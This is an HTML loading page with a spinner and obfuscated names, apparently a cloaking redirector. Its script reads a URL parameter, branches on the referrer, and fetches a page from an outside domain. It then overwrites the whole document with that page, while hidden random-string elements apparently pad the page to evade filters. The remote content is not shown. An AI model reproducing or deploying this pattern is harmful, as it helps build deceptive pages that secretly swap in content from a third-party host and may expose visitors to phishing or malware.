<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .YNIHBn3IX {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .YNIHBn3IX .Zz41wK {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .YNIHBn3IX .content {
            line-height: 50px;
            text-align: center
        }

        .YNIHBn3IX .img {
            width: 100%
        }

        .YNIHBn3IX .Cv2LfPQ9eK {
            text-align: center
        }

        .YNIHBn3IX .Cv2LfPQ9eK span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .YNIHBn3IX .Cv2LfPQ9eK span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .YNIHBn3IX .Cv2LfPQ9eK span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .YNIHBn3IX .Cv2LfPQ9eK span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .YNIHBn3IX .Cv2LfPQ9eK span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .YNIHBn3IX .Cv2LfPQ9eK span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .YNIHBn3IX .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function XbNOlrNcvyejD(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var bR4xWUp = XbNOlrNcvyejD('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ bR4xWUp +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ bR4xWUp +".html?a=share";
		}
		
        dLfH5nse=url+"#"+new Date().getTime();
        dLfH5nse && function() {
            $.get(dLfH5nse, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >oW59eAMceCVWfHFxpSH72JRmP</b>
<div style='display:none'>InASXXLREJO1K1iZ0MVWcf4WAN4xJx2uJrZrVSSjLnDPT5jicdU</div>
<p  style='display:none'>Yh34qVKr8LhR12t5tv0Fi488R376CXS7K9CnGD55tvyDdN611Q4sWAJjlKy1OhBZjT7KA0hsab9</p>
<img  src='' style='display:none'><div class="YNIHBn3IX">
    <div class="Zz41wK">
        <div class="Cv2LfPQ9eK">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >ZTM831N3ImfcpYa6pC0tFw6kWRhBQwcjzviFZgSlnHG72ptHTzTp6GoaPw6ZFCZSSEg</h1>
<p  style='display:none'>k01yjLQoKPlYN4HnNM01gyHkaJgiOmXqkXVpJOIp</p>
<p  style='display:none'>k01yjLQoKPlYN4HnNM01gyHkaJgiOmXqkXVpJOIp</p>
<ul style='display:none' >AGrRLp1LjdQSI72qwsgQ7khnkaUeCzkWrDHLHRQD1awaDkA3IzkpAzahgivJi</ul>
<a  href='#' style='display:none'>RvAZ1kmNYHuHLl</a>
<b style='display:none' >jG7ZkN3dmEaijbMKxlMW9otpUFKy3Fb5GlBb5sVyDZC9vdofX8xNXAkYWGGBq81NH3ijPqqzKbJdqiOy3eSPyJwDt5QqR5Mvn0FmB</b></body>
</html>